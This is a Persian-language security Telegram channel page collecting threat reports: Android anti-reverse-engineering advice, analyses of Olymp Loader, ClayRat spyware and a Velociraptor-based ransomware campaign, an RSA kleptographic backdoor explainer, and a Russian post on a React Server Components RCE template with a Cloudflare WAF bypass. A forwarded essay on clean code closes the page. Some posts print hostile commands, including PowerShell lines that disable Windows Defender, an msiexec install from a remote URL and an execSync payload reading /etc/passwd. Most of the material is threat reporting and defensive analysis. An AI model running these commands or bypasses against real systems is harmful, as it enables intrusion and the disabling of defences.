Mr. SAM – Telegram
Mr. SAM
148 subscribers
131 photos
7 videos
23 files
751 links
یکشنبه
۷ ‏( دی = ۱۰ )‏ ۱٤۰٤
‏28 ( دسامبر = december = 12 ) 2025
تکنیک‌ها ، کالبدشکافی ، درک عمیق ، یک قدم جلوتر ...
https://news.1rj.ru/str/boost/NullError_ir
Download Telegram
#ReverseEngineeringAndroid_Rust

مهندسی معکوس APK اندروید

سخت‌ترین حالت برای مهندسی معکوس، توسعه اپلیکیشن به صورت Hybrid است که در آن منطق اصلی (Core Logic) به زبان ++C یا ترجیحاً Rust نوشته شده، به صورت کتابخانه Native (.so) کامپایل شده و با استفاده از تکنیک‌های O-LLVM و Virtualization محافظت می‌شود.

تحلیل فنی :

۱. جاوا (Java) و کاتلین (Kotlin): بازنده مطلق

این دو زبان برای توسعه Native اندروید استفاده می‌شوند، اما برای امنیت منطق (Code Logic) بدترین گزینه هستند.

ساختار: کدهای جاوا و کاتلین به Bytecode ماشین مجازی جاوا (JVM/Dalvik) ترجمه می‌شوند.

مهندسی معکوس: با ابزارهایی مثل Jadx، Apktool یا JEB Decompiler، فایل‌های .dex به راحتی به کد منبع (Source Code) تقریبا اصلی برمی‌گردند.

دفاع: استفاده از R8 یا ProGuard فقط نام کلاس‌ها و متغیرها را تغییر می‌دهد (Obfuscation سطحی) که برای یک تحلیلگر با تجربه، مانع جدی نیست.

۲. فلاتر (Flutter): گزینه میانی (مزاحم اما نه غیرممکن)

فلاتر از جاوا/کاتلین امن‌تر است، اما غیرقابل نفوذ نیست.

ساختار: کدهای Dart در حالت Release به صورت AOT (Ahead-of-Time) به کدهای باینری ماشین (Machine Code) کامپایل می‌شوند و در یک فایل کتابخانه بزرگ (معمولاً libapp.so) قرار می‌گیرند.

مهندسی معکوس: مهندسی معکوس فلاتر نیاز به دانش عمیق‌تری از ساختار داخلی Dart VM دارد. ابزارهایی مثل ReFlutter یا اسکریپت‌های Doldrums وجود دارند که می‌توانند Snapshotهای دارت را دامپ کنند. اگرچه کد تمیز به دست نمی‌آید، اما Stringها و منطق کلی قابل استخراج است.

نقطه ضعف: ساختار فلاتر استاندارد است؛ اگر تحلیلگر بداند دنبال چه چیزی بگردد (مثل جداول متدها)، می‌تواند پچ‌های Frida را اعمال کند.

۳. نیتیو (C/++C و Rust) در قالب .so: قلعه دفاعی

این قوی‌ترین روش موجود است. استفاده از NDK (Native Development Kit) باعث می‌شود کد شما مستقیماً به Assembly (معمولاً ARM64) کامپایل شود.

چرا این روش سخت‌تر است؟

از بین رفتن ساختار: اطلاعات سطح بالا (High-level) مثل نام متغیرها، ساختار کلاس‌ها و نوع داده‌ها در فرآیند کامپایل از بین می‌روند. تحلیلگر باید مستقیماً با اسمبلی و رجیسترها در IDA Pro یا Ghidra کار کند.

پیچیدگی جریان کنترل: کامپایلرهای ++C و Rust کدهای بهینه‌سازی شده‌ای تولید می‌کنند که دنبال کردن جریان برنامه (Control Flow) را بسیار دشوار می‌کند.

چگونه اپلیکیشنی بسازیم که "کابوس" تحلیلگران شود؟

برای رسیدن به سطح امنیت مناسب ، تنها استفاده از ++C کافی نیست.پیشنهاد میکنم معماری زیر را پیاده‌سازی کنید:

گام اول: انتخاب زبان (پیشنهاد من: Rust)

به جای ++C، از Rust استفاده کنید.

چرا؟ باینری‌های تولید شده توسط Rust به دلیل نحوه مدیریت حافظه و ماکروها، بسیار پیچیده‌تر و "کثیف‌تر" از ++C هستند. تحلیل آنها در Ghidra برای تشخیص توابع استاندارد بسیار سخت‌تر است. همچنین Rust در برابر آسیب‌پذیری‌های حافظه (Buffer Overflow) که تحلیلگران برای اکسپلویت استفاده می‌کنند، ایمن است.

گام دوم: استفاده از O-LLVM (Obfuscator-LLVM)

کد Native خود را با یک کامپایلر استاندارد بیلد نکنید. از نسخه شخصی‌سازی شده LLVM استفاده کنید تا تکنیک‌های زیر را روی فایل .so اعمال کند:

۔Control Flow Flattening (CFF): ساختار شرطی if/else و حلقه‌ها را به یک ساختار مسطح و پیچیده تبدیل می‌کند که گراف جریان برنامه (CFG) را در IDA Pro غیرقابل خواندن می‌کند.

۔Bogus Control Flow: اضافه کردن بلوک‌های کد جعلی که هرگز اجرا نمی‌شوند اما تحلیلگر را گمراه می‌کنند.

۔Instruction Substitution: جایگزینی دستورات ساده ریاضی (مثل جمع) با فرمول‌های پیچیده ریاضی که همان نتیجه را می‌دهند.

گام سوم: تکنیک‌های Anti-Tamper و Anti-Frida (در سطح Native)

همه چک‌های امنیتی را در لایه Native انجام دهید، نه جاوا.

۔Direct Syscalls: برای انجام عملیات حساس (مثل خواندن فایل یا شبکه)، از توابع استاندارد libc (مثل open, read) استفاده نکنید، زیرا Frida به راحتی آنها را هوک (Hook) می‌کند. مستقیماً از دستورات اسمبلی SVC (در ARM64) برای صدا زدن کرنل استفاده کنید.

تشخیص Frida: اسکن proc/self/maps برای پیدا کردن کتابخانه‌های frida-agent یا پورت‌های باز مربوط به frida-server.

۔TracerPid Check: بررسی وضعیت TracerPid در فایل /proc/self/status. اگر غیر از ۰ باشد، یعنی برنامه‌ای (مثل دیباگر) به اپلیکیشن متصل است. این کار را در یک ترد جداگانه و مخفی انجام دهید.

گام چهارم: رمزنگاری رشته‌ها (String Encryption)

هیچ رشته متنی (مثل URL سرور، کلیدهای API) نباید به صورت Cleartext در فایل .so باشد.

همه رشته‌ها را در زمان کامپایل XOR کنید و فقط در لحظه نیاز در حافظه دیکد کرده و بلافاصله پاک کنید.
Please open Telegram to view this post
VIEW IN TELEGRAM
2
Mr. SAM
#ReverseEngineeringAndroid_Rust مهندسی معکوس APK اندروید سخت‌ترین حالت برای مهندسی معکوس، توسعه اپلیکیشن به صورت Hybrid است که در آن منطق اصلی (Core Logic) به زبان ++C یا ترجیحاً Rust نوشته شده، به صورت کتابخانه Native (.so) کامپایل شده و با استفاده از…
نتیجه‌گیری و توصیه اجرایی

برای ساخت امن‌ اپلیکیشن اندرویدی:

رابط کاربری (UI) را با Kotlin یا Flutter بسازید.

تمام منطق حساس، الگوریتم‌ها و ارتباطات شبکه را با زبان Rust بنویسید.

از طریق JNI (در کاتلین) یا FFI (در فلاتر) با لایه Native ارتباط برقرار کنید.

کتابخانه Rust را با فلگ‌های Obfuscation کامپایل کنید.

مکانیزم‌های Anti-Debug و Checksum فایل APK را داخل همان کتابخانه Rust قرار دهید.


📎یک نمونه اپ بسیار ساده از نحوه صدا زدن یک تابع امن Rust در اندروید (از طریق JNI) را برای علاقه مندان نوشته و در ⬅️گیت‌هابم ➡️قرار داده‌ام .

این اپ اندرویدی با rust در نیتیو به آدرس telegram.org ریکوئست میزند . به عمد یک آدرس فیلتر شده و آن هم تلگرام را گذاشته‌ام که با نوع کد نویسی آشنا شوید .

معماری پروژه

لایه Rust: مسئول برقراری اتصال HTTPS (با استفاده از reqwest یا ureq و rustls). این لایه TLS Handshake را خودش انجام می‌دهد که شنود آن سخت‌تر است.

لایه JNI: پل ارتباطی بین کاتلین و Rust.

لایه Kotlin (WorkManager): برای اجرای تسک در پس‌زمینه (Background) بدون نیاز به باز بودن برنامه و سازگار با محدودیت‌های Doze mode از اندروید 10 به بالا.

در گیت‌هاب توضیحات بیشتری است که حتما بخوانید 🔵

⚠️ این پروژه صرفاً با اهداف آموزشی در زمینه امنیت توسعه یافته است. استفاده از این تکنیک‌ها در بدافزارها یا اپلیکیشن‌های مخرب غیرقانونی و غیراخلاقی است.

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Mr. SAM pinned «نتیجه‌گیری و توصیه اجرایی برای ساخت امن‌ اپلیکیشن اندرویدی: رابط کاربری (UI) را با Kotlin یا Flutter بسازید. تمام منطق حساس، الگوریتم‌ها و ارتباطات شبکه را با زبان Rust بنویسید. از طریق JNI (در کاتلین) یا FFI (در فلاتر) با لایه Native ارتباط برقرار کنید.…»
#Indirect_Shellcode_Executor

اجراکننده‌ی غیرمستقیم شل‌کد، برای استفاده از آسیب‌پذیری/پیکربندی نادرست موجود در متد ReadProcessMemory از API ویندوز .

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
#Olymp_Loader

تهدید نوظهور : تبلیغ سرویس بدافزار جدید در انجمن‌های هکرها با ویژگی‌های ضد تحلیل و تشخیص

تحلیل بدافزار Olymp Loader: سرویس بدافزار (MaaS) مبتنی بر اسمبلی و تکامل مکانیزم‌های FUD

گزارش‌های اخیر از سطح زیرین فروم‌های هکری (Underground Forums) مانند XSS و HackForums حاکی از ظهور یک بدافزار جدید و خطرناک در عرصه Malware-as-a-Service (MaaS) به نام Olymp Loader است. این بدافزار که توسط اپراتوری با نام مستعار OLYMPO توسعه یافته، با ادعای کدنویسی ۱۰۰٪ به زبان اسمبلی ، وعده عملکرد بالا و نرخ تشخیص (Detection Rate) بسیار پایین را به مجرمان سایبری می‌دهد.

ویژگی‌های کلیدی و معماری فنی

برخلاف بسیاری از لودرها که صرفاً یک Wrapper ساده هستند، Olymp Loader یک ابزار چندمنظوره است که نقش Loader، Crypter و Stealer را ایفا می‌کند.

1. زبان و ساختار: توسعه‌دهنده ادعا می‌کند تمام کدها به زبان Assembly نوشته شده‌اند تا مهندسی معکوس (Reverse Engineering) را دشوار کرده و حجم فایل را به حداقل برساند. این ویژگی به عنوان اصلی‌ترین فاکتور فروش برای وضعیت FUD (Fully UnDetectable) تبلیغ می‌شود.

2. تغییر استراتژی (Pivot) در آگوست ۲۰۲۵:

* تا قبل از آگوست، این بدافزار دارای قابلیت‌های Botnet و پنل وب بود.

* در یک تغییر ساختار عمده (Restructuring)، قابلیت‌های بات‌نت حذف و تمرکز کاملاً بر روی Dropper/Loader بودن قرار گرفت.

* مکانیزم جدید: پی‌لود نهایی (مانند LummaC2 یا Raccoon) اکنون مستقیماً درون Stub و به صورت Encrypted تعبیه می‌شود و تنها پس از غیرفعال‌سازی آنتی‌ویروس اجرا می‌گردد.

مکانیزم‌های فرار از تشخیص و Anti-Analysis

تکنیک‌های بکار رفته برای دور زدن دفاع‌های میزبان (Host Defenses) بسیار تهاجمی است:

* غیرفعال‌سازی Windows Defender: بدافزار از دستورات PowerShell و ابزارهای جانبی برای کور کردن سیستم دفاعی استفاده می‌کند:

 
Set-MpPreference -DisableRealtimeMonitoring $true

Set-MpPreference -DisableScanningNetworkFiles $true

Set-MpPreference -DisableIOAVProtection $true

Add-MpPreference -ExclusionPath $env:TEMP


استفاده از ابزار Defender Remover: لودر با دراپ کردن ابزارهایی مانند PowerRun.exe و اسکریپت‌های .reg در دایرکتوری Temp، اقدام به حذف سرویس‌های امنیتی، پاک کردن فایل‌های SecurityHealthSystray.exe و دستکاری فولدر WinSxS می‌کند.

پایداری (Persistence): ایجاد شورتکات در فولدر Startup و کپی کردن خود در مسیر %AppData% با نام‌های رندوم.

ماژول‌های سرقت اطلاعات (Stealer Modules)

سرویس Olymp Loader علاوه بر لود کردن بدافزارهای دیگر، دارای ماژول‌های داخلی قدرتمندی است:

Telegram Stealer (tgsteal.py):

* نوشته شده به زبان پایتون.

* پروسه‌های تلگرام را می‌بندد (Kill Process).

* با استفاده از Regex به دنبال فایل‌های key_datas می‌گردد و آن‌ها را همراه با اسکرین‌شات ارسال می‌کند.

Browser Stealer:

* ترکیبی از ++C و پایتون (کامپایل شده با Nuitka).

* مهندسی معکوس نشان می‌دهد که این ماژول نسخه مودیفای شده‌ای از پروژه متن‌باز BrowserSnatch است که لیست تارگت‌های آن دو برابر شده است.

* آرتفکت‌هایی مانند brsteal.dll در دایرکتوری‌های موقت Nuitka قابل مشاهده است.

Crypto Stealer: هدف قرار دادن کیف پول‌هایی مثل Exodus، Electrum و Atomic.

روش‌های توزیع و شکار (Hunting)

وکتور حمله: استفاده از GitHub Releases جعلی. مهاجمین فایل‌های مخرب را با نام‌های فریبنده مثل NodeJs.exe ، PuTTY یا Zoom در مخازن گیت‌هاب آپلود می‌کنند تا ترافیک شبکه را مشروع (Legitimate) جلوه دهند.

پی‌لودهای نهایی مشاهده شده:

*۔ LummaC2 (۴۶٪)

*۔ WebRAT / SalatStealer (۳۱٪)

*۔ QasarRAT (۱۵٪)

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
1
#RSA_Backdoor_Generator

چند ساعتی است که یک مخزن گیتهاب عمومی شده که یک (Proof of Concept) از حمله معروف
Young & Yung (1996)
به نام
SETUP (Secretly Embedded Trapdoor with Universal Protection)
است که به زبان Go نوشته شده.

این پروژه نشان می‌دهد که چطور می‌توان یک «بکدور نامتقارن» (Asymmetric Backdoor) را درون فرآیند تولید کلید RSA مخفی کرد، به طوری که حتی با داشتن سورس‌کد (الگوریتم) و تحلیل خروجی‌ها، هیچ‌کس جز مهاجم نتواند کلید را بشکند.

### تحلیل فنی و مکانیزم عملکرد (Kleptography)

در حالت عادی، کلیدهای RSA ($n, e, d$) بر اساس دو عدد اول تصادفی $p$ و $q$ ساخته می‌شوند. اما در این ابزار، این اعداد تصادفی نیستند:

1. تزریق (Infection):

* تولیدکننده کلید (Generator) ابتدا یک عدد تصادفی (Seed) به نام $s$ تولید می‌کند.

* عدد اول $p$ از هش $s$ مشتق می‌شود: $p = H(s)$.

* سپس $s$ با استفاده از کلید عمومی مهاجم ($E_{att}, N_{att}$) رمزگذاری می‌شود تا مقدار $c$ بدست آید:

$$c = s^{E_{att}} \pmod{N_{att}}$$

* حالا نکته کلیدی اینجاست: عدد اول دوم ($q$) طوری انتخاب می‌شود که وقتی $n = p \times q$ محاسبه شد، مقدار $c$ (که همان سید رمزگذاری شده است) در بیت‌های بالایی (Most Significant Bits) عدد $n$ قرار بگیرد.

* به زبان ساده: کلید عمومی قربانی، حاوی نسخه رمزگذاری شده کلید خصوصی اوست.

2. استخراج (Extraction):

* مهاجم فقط به کلید عمومی قربانی ($n$) نیاز دارد.

* مهاجم بیت‌های بالایی $n$ را برمی‌دارد (که همان $c$ است).

* چون مهاجم کلید خصوصی خودش ($D_{att}$) را دارد، $c$ را رمزگشایی کرده و $s$ را بدست می‌آورد.

* با داشتن $s$، مقدار $p$ را بازسازی کرده و با تقسیم $n$ بر $p$، کلید خصوصی قربانی را کامل بدست می‌آورد.

### ویژگی‌های کد (Code Analysis)

* زبان: Go (Golang).

* روش ساخت: Brute-force هوشمند. کد آنقدر $q$ های مختلف را امتحان می‌کند تا رابطه ریاضی $n$ طوری تنظیم شود که $c$ در بالای آن قرار گیرد.

* مولفه‌های اصلی:

۔* generator.go: ابزار آلوده برای تولید کلید برای قربانی.

۔* decryptor.go: ابزار مخصوص مهاجم برای استخراج کلید خصوصی از روی کلید عمومی قربانی.

### سطح خطر و اهمیت امنیتی

این حمله کابوس سیستم‌های رمزنگاری است زیرا:

1. غیرقابل تشخیص (Indistinguishable): کلید عمومی تولید شده ($n$) از نظر آماری کاملاً تصادفی به نظر می‌رسد و هیچ تستی نمی‌تواند وجود درب‌خلفی را ثابت کند.

2. انحصاری: برخلاف درب‌های پشتی ساده (مثل استفاده از اعداد اول ثابت)، در اینجا اگر کسی متوجه الگوریتم شود، باز هم نمی‌تواند کلیدهای قربانیان را بشکند، مگر اینکه کلید خصوصی مهاجم را داشته باشد.

3. کاربرد: این متد در حملات زنجیره تأمین (Supply Chain Attacks)، کارت‌های هوشمند (Smart Cards) و ماژول‌های امنیتی سخت‌افزاری (HSM) که "جعبه سیاه" هستند، بسیار محتمل است.

### نتیجه‌گیری

این مخزن اثبات می‌کند که "اعتماد به جعبه سیاه در رمزنگاری اشتباه محض است". اگر شما از یک کتابخانه کامپایل شده یا سخت‌افزار بسته برای تولید کلید استفاده می‌کنید، هیچ راهی برای اثبات اینکه کلید خصوصی شما قبلاً برای سازنده ارسال نشده (یا در دل کلید عمومی مخفی نشده) وجود ندارد.

پتانسل حمله بسیار بالاست ...

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
#EvilCrowCableWind

کابل شارژی که دستگاه شما را هک می‌کند
یک BadUSB مبتنی بر ESP32-S3 .
ماژول در حالت STATION پیکربندی شده . شما باید یک نقطه دسترسی وای‌فای با تلفن همراه یا دستگاه دیگری راه‌اندازی کنید، کابل به طور خودکار به آن متصل می‌شود.
اینجا به صورت کامل در موردش (نصب و راه اندازی و غیره ) توضیح داده . ماژول هم که همه جا پیدا میشه ...
زیاد در کابل شارژ و موس و صفحه کلید و غیره پیدا میشه ..

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
👍21
#Hackers_VelociraptorDFIR

سوءاستفاده هوشمندانه هکرها از ابزار فارنزیک Velociraptor برای C2 و توزیع باج‌افزار

در یک چرخش تکنیکی قابل توجه، هگرها به جای استفاده از بدافزارهای سفارشی برای Command and Control (C2)، به سراغ ابزارهای قانونی و قدرتمند DFIR (Digital Forensics and Incident Response) رفته‌اند. گزارش‌های جدید محققان نشان می‌دهد که ابزار قانونی و محبوب Velociraptor اکنون به سلاحی برای استقرار باج‌افزار Warlock و ایجاد دسترسی پایدار تبدیل شده است.

استفاده از ابزارهای قانونی (Living off the Land) تشخیص را برای تیم‌های SOC بسیار دشوار می‌کند، زیرا ترافیک و پروسه‌های Velociraptor در بسیاری از محیط‌ها "تراست‌شده" و سفید محسوب می‌شوند.

زنجیره حمله (Kill Chain) و تحلیل فنی

مهاجمین در این کمپین‌ها از ترکیبی از آسیب‌پذیری‌های وب، ابزارهای مدیریت سیستم و تانل‌های رمزنگاری شده استفاده کرده‌اند.

# ۱. دسترسی اولیه (Initial Access): بهره‌برداری از SharePoint و WSUS

نقطه ورود در اکثر موارد، اکسپلویت کردن سرورهای Patch نشده بوده است:

ToolShell Chain: استفاده از زنجیره آسیب‌پذیری SharePoint. ابتدا بای‌پس احراز هویت (CVE-2025-49706) و سپس اجرای کد از راه دور (CVE-2025-49704). مهاجمین فایل‌های سیستمی شیرپوینت مانند start.aspx یا ToolPane.aspx را به Web Shell تبدیل کرده‌اند.

WSUS Exploitation: در برخی موارد، اکسپلویت CVE-2025-59287 روی سرویس WSUS مشاهده شده است.

# ۲. استقرار C2 با Velociraptor

پس از نفوذ، مهاجم با استفاده از دستورات msiexec ، نسخه‌های MSI ابزار Velociraptor را از دامنه‌های Cloudflare Workers دانلود و نصب می‌کند:
msiexec /q /i https:// [REDACTED] .workers .dev/ v3 .msi

> نکته فنی: از آنجایی که Velociraptor به عنوان یک سرویس ویندوز نصب می‌شود، مهاجم بلافاصله دسترسی سطح SYSTEM و Persistence (پایداری) را به دست می‌آورد. این ابزار دقیقاً برای اجرای دستورات سطح پایین و کوئری گرفتن از سیستم طراحی شده که اکنون در خدمت مهاجم است.

# ۳. تانلینگ پیشرفته: دور زدن فایروال با VS Code و Cloudflare

برای مخفی ماندن ترافیک C2، مهاجمین از تکنیک‌های هوشمندانه‌ای استفاده کردند:

VS Code Tunnels: دانلود و نصب code.exe (نسخه CLI ویژوال استودیو کد). از آنجا که این باینری توسط مایکروسافت امضا شده (Signed Binary)، توسط بسیاری از EDRها مسدود نمی‌شود. مهاجم با دستور tunnel service install یک تانل معکوس به سمت خود ایجاد می‌کند.

Cloudflare Tunnels: استفاده از cloudflared.exe برای ایجاد تانل‌های خروجی امن که ترافیک مخرب را در دل ترافیک HTTPS قانونی مخفی می‌کند.

تحلیل رفتاری و اشتباهات عجیب مهاجم 🥴

در جریان بررسی لاگ‌ها، چندین اشتباه مبتدیانه از سمت مهاجم (احتمالاً گروه Storm-2603) مشاهده شد که نشان می‌دهد حتی گروه‌های باج‌افزاری پیشرفته نیز دچار خطای انسانی می‌شوند:

* تایپ دستورات لینوکسی در ویندوز: مهاجم دستور cat را در محیط CMD ویندوز اجرا کرده است!

* فراموشی سینتکس: تلاش برای ساخت یوزر ادمین (net user adminbak ... ) بدون سوئیچ /add که منجر به خطای دستور شد.

* تلاش‌های ناموفق: تلاش برای اجرای سرویس SSH قبل از نصب شدن آن روی سیستم.

باج‌افزار Warlock

هدف نهایی در یکی از این نفوذها، استقرار باج‌افزار Warlock بوده است. این باج‌افزار که از ژوئن ۲۰۲۵ فعال شده، پس از تثبیت دسترسی از طریق Velociraptor و غیرفعال کردن Windows Defender، اقدام به رمزگذاری فایل‌ها می‌کند. نکته جالب اینجاست که در Note باج‌افزار، به دروغ ادعا شده نفوذ از طریق WSUS بوده، در حالی که شواهد فنی نفوذ از طریق SharePoint را تایید می‌کند (تکنیک Misdirection).

>> راهکارها

برای مقابله با این سبک از حملات که از ابزارهای مجاز سوءاستفاده می‌کنند، باید روی Behavioral Analytics تمرکز کنید:

۱. مانیتورینگ پروسه‌های فرزند IIS:

پروسه w3wp.exe نباید پروسه‌هایی مانند cmd.exe ، powershell.exe یا msiexec.exe را اسپان (Spawn) کند. این نشانه قطعی وجود Web Shell است.

۲. بررسی نصب‌کننده‌های MSI:

اجرای msiexec که به URLهای خارجی (به خصوص دامنه‌های workers.dev یا github.io) اشاره دارد را بلاک کنید.

۳. شناسایی ابزارهای مدیریتی غیرمجاز:

اگر در سازمان شما از Velociraptor استفاده نمی‌شود، وجود پروسه یا سرویس آن باید بلافاصله به عنوان Incident تلقی شود.

۴. کنترل تانل‌ها:

ترافیک خروجی code.exe یا cloudflared.exe را در فایروال لبه شبکه محدود کنید و آرگومان‌های خط فرمان code.exe را برای کلمه کلیدی tunnel مانیتور کنید.

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
#ClayRat

تحلیل بدافزار ClayRat:
نسل جدید جاسوس‌افزارهای اندرویدی با قابلیت دور زدن Play Protect


تیم تحقیقاتی زیمپریوم اخیراً از یک تروجان دسترسی از راه دور (RAT) جدید تحت عنوان ClayRat پرده برداشته است که سطح جدیدی از پیچیدگی در تهدیدات موبایلی را به نمایش می‌گذارد. این بدافزار که اولین بار در اکتبر ۲۰۲۵ شناسایی شد، با هدف‌گیری کاربران از طریق جعل برنامه‌های محبوب (مانند YouTube، تلگرام و اپلیکیشن‌های خدماتی روسی) و توزیع از طریق دامین‌های فیشینگ و حتی سرویس‌های ابری مثل Dropbox، به سرعت در حال گسترش است.

مکانیزم عملکرد و فرار از شناسایی (Defense Evasion)

بدافزار ClayRat از یک تکنیک پیشرفته Dropper برای عبور از سدهای امنیتی اندروید استفاده می‌کند. برخلاف بدافزارهای سطح پایین، Payload مخرب اصلی در این بدافزار به صورت رمزنگاری شده با الگوریتم AES/CBC و کلیدهای تعبیه‌شده (Embedded Keys) در پوشه Assets برنامه مخفی می‌شود و تنها در زمان اجرا (Runtime) استخراج و فعال می‌گردد. این تکنیک باعث می‌شود آنالیز استاتیک و شناسایی امضا توسط آنتی‌ویروس‌های معمولی دشوار شود.

سوءاستفاده از Accessibility Services

خطرناک‌ترین ویژگی ClayRat، بهره‌برداری تهاجمی از سرویس‌های دسترسی‌‌پذیری (Accessibility) است. پس از فریب کاربر برای اعطای این مجوز به همراه مجوز پیش‌فرض SMS، بدافزار اقدامات زیر را انجام می‌دهد:

۱. غیرفعال‌سازی Google Play Protect: بدافزار با شبیه‌سازی کلیک‌های کاربر، وارد تنظیمات شده و سپر امنیتی گوگل را بدون اطلاع قربانی خاموش می‌کند.

۲. سرقت اعتبارنامه قفل صفحه: تمامی تعاملات کاربر با صفحه قفل (Lock Screen) مانیتور می‌شود. الگوها (Patterns)، پین‌کدها و پسوردها با دقت بالا بازسازی شده و در SharedPreferences (تحت کلید lock_password_storage) ذخیره می‌شوند.

۳. بازگشایی خودکار (Auto-unlock): با استفاده از اعتبارنامه‌های سرقت شده، بدافزار می‌تواند مکانیزم امنیتی صفحه قفل را دور زده و دسترسی مداوم خود را حفظ کند.

قابلیت‌های جاسوسی و Exfiltration

پس از استقرار کامل، ClayRat دسترسی کاملی به داده‌های قربانی پیدا می‌کند:

* سرقت کامل پیامک‌ها (SMS) و لیست تماس‌ها.

* شنود و رهگیری نوتیفیکیشن‌ها (برای سرقت کدهای 2FA).

* ضبط صفحه نمایش با استفاده از MediaProjection API.

* عکس‌برداری مخفیانه با دوربین دستگاه.

...

شماهایی که سریع دست به اس.لحه (صفحه‌کلید ... ) هستین حتما نگهبانی گماشتین دیگه . با دسترسی به AccessibilityService و ایجاد آپشن‌های مختلف رصد کنید و تحلیل رفتار پویا داشته باشید .

@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2025-55182-custom-simple.yaml
1 KB
🔥 Интересный кейс с CVE-2025-55182 и байпас Cloudflare

При детекте уязвимости CVE-2025-55182 (React Server Components RCE) столкнулся с проблемой:
темплейты не детектили уязвимость на ряде хостов где ручная валидация POST реквеста находила
Официальный темплейт от ProjectDiscovery тоже не сработал

💡 Найденное решение - байпас Cloudflare:

Ключевое отличие - огромный base64 блок (131KB) с случайным именем поля "hlmvbjtvunst".

Зачем это нужно:
🔹 Большой размер запроса обходит проверки размера WAF
🔹 Случайные данные обходят сигнатурные проверки
🔹 Случайное имя поля обходит проверки имен полей

📝 Структура payload:

execSync('cat /etc/passwd | awk -v ORS=- 1')

Результат возвращается через redirect:

X-Action-Redirect: /login?a=root:x:0:0:root:/root:/bin/sh-...


Финальное решение:
Создал универсальный темплейт с двухэтапным подходом:
1. Первый блок - без base64 (быстро для обычных инстансов)
Проверяет 7 стандартных путей: /api, /, /formaction, /actions и др.
2. Второй блок - с base64 обходом Cloudflare (если первый не сработал)

Особенности:
• Работает на разных путях Next.js/React Server Components
• Автоматически определяет необходимость байпаса Cloudflare
• Прямой детект через чтение /etc/passwd
• Специфичные matchers избегают ложных срабатываний

💭 Выводы:
1. WAF/Cloudflare могут блокировать даже валидные эксплойты
2. Большие случайные данные могут обходить защиту
3. Важно анализировать рабочие запросы из Burp, а не только PoC
4. Двухэтапный подход оптимизирует массовое сканирование
malware-analysis-report-brickstorm-backdoor.pdf
1.4 MB
گزارش تحلیل بدافزار بک‌دور BRICKSTORM که توسط هکرهای دولتی چین و با زبان GO نوشته شده . ارائه مشترک توسط آژانس امنیت سایبری و زیرساخت (CISA)، آژانس امنیت ملی (NSA) و مرکز امنیت سایبری کانادا (CCCS) در تاریخ ۴ دسامبر ۲۰۲۵ منتشر شده است.
آسیب پذیری در Gogs , یک پلتفرم سلف‌هاست متن‌باز برای مدیریت مخازن Git.

https://github.com/Ashwesker/Blackash-CVE-2025-8110
این تصویر رو بدید به هوش مصنوعی و بخواید در موردش توضیح بده ...
Forwarded from Md Daily (Mahan)
کد تمیز افسانه نیست؛ فقط دوام نمیاره

مشکل این نیست که هیچ‌کس کد تمیز نمی‌نویسه.
مشکل اینه که کد تمیز تو پروژه‌های واقعی، زیر فشارِ کار کم‌کم داغون میشه.

اگه یه مدت تو یه تیم کار کرده باشی، حتماً دیدی: کدی که اوایل مرتب و قابل فهم بوده، با اضافه شدن فیچرهای عجله‌ای، ددلاین‌ها و تصمیم‌های لحظه‌ای، کم‌کم شلوغ و سخت‌فهم میشه. نه به این خاطر که برنامه‌نویسا بلد نیستن، به این خاطر که واقعیت پروژه این شکلیه.

اصلاً کد تمیز یعنی چی؟

کد تمیز یه چیز کاملاً سلیقه‌ای نیست. بعضی چیزاش واضحه: اسم متغیر و فانکشن باید درست باشه، هر تیکه کد باید کار خودش رو بکنه، وابستگی‌ها نباید قاطی‌پاطی باشن و بشه راحت تغییرش داد بدون اینکه کل سیستم بریزه به هم.
البته همه‌چیز هم قانون خشک نداره. کدی که امروز تمیزه، ممکنه چند ماه دیگه فقط قابل تحمل باشه.

تعریف ساده‌ش اینه: کدی که تغییر دادنش از نوشتنش کم‌هزینه‌تره.

🖥 پروژه‌ها از اول داغون نیستن، داغون میشن.

تقریباً هیچ پروژه‌ای از همون اول شلخته شروع نمیشه. همه‌چی مرتب و با برنامه جلو میره. ولی کم‌کم ددلاین میاد، مشتری عجله داره، بازار فشار میاره. اگه حواست نباشه، اون نظم اولیه می‌پاشه.

🖥 پروتوتایپی که قرار نبود بمونه.

یه کد موقتی می‌نویسن که فقط یه چیز رو نشون بده. قرار بوده یکی دو هفته بعد بندازنش دور. ولی بیزنس خوشش میاد، میگه یه چیز کوچولو هم بهش اضافه کن. بعد یکی دیگه. بعد یهو همون کد میره تو پروداکشن و میشه هسته‌ی سیستم. اینجا مشکل کد بد نیست، مشکل اینه که تصمیم بد جدی گرفته شده.

🖥 ریفکتوری که تموم نمیشه.

اگه یه تمیزکاری سال‌ها طول کشیده، معمولاً مشکل از کد نیست. یا تست ندارین، یا معلوم نیست مسئول این بخش کیه، یا همه می‌ترسن دست بزنن چیزی خراب بشه. ریفکتور وقتی به کار واقعی وصل نباشه، میشه کاری که همیشه هست ولی هیچ‌وقت تموم نمیشه.

سنیور سخت‌گیر همیشه خوب نیست.


سنیوری که فقط ایراد می‌گیره و فضا رو ترسناک می‌کنه، به تمیز شدن کد کمک نمی‌کنه. باعث میشه بقیه یواشکی کد بزنن که فقط کار راه بیفته. اینجوری کد بد قایم میشه، نه اینکه درست بشه.

راه‌حل‌های موقت، وقتی دائم میشن دردسر می‌سازن.


یه هک سریع یا فلگ موقتی بعضی وقتا لازمه. مشکل وقتی شروع میشه که اسم درست نداره، کسی نمی‌دونه چرا هست، و معلوم نیست کی باید حذفش کنه. اون موقع میشه یه تیکه خطرناک که همه ازش فرار می‌کنن.

🤖 هوش مصنوعی کد زشت نمی‌نویسه، کد بی‌مسئولیت می‌نویسه.

کدی که AI می‌ده معمولاً قشنگه، ولی نمی‌دونه پروژه قراره کجا بره، چرا این تصمیم گرفته شده، و آخرش کی قراره نگه‌داریش کنه. کدی که صاحب نداشته باشه، حتی اگه تمیز به نظر بیاد، آخرش دردسر میشه.

📊 بیزنس و کد دشمن هم نیستن.

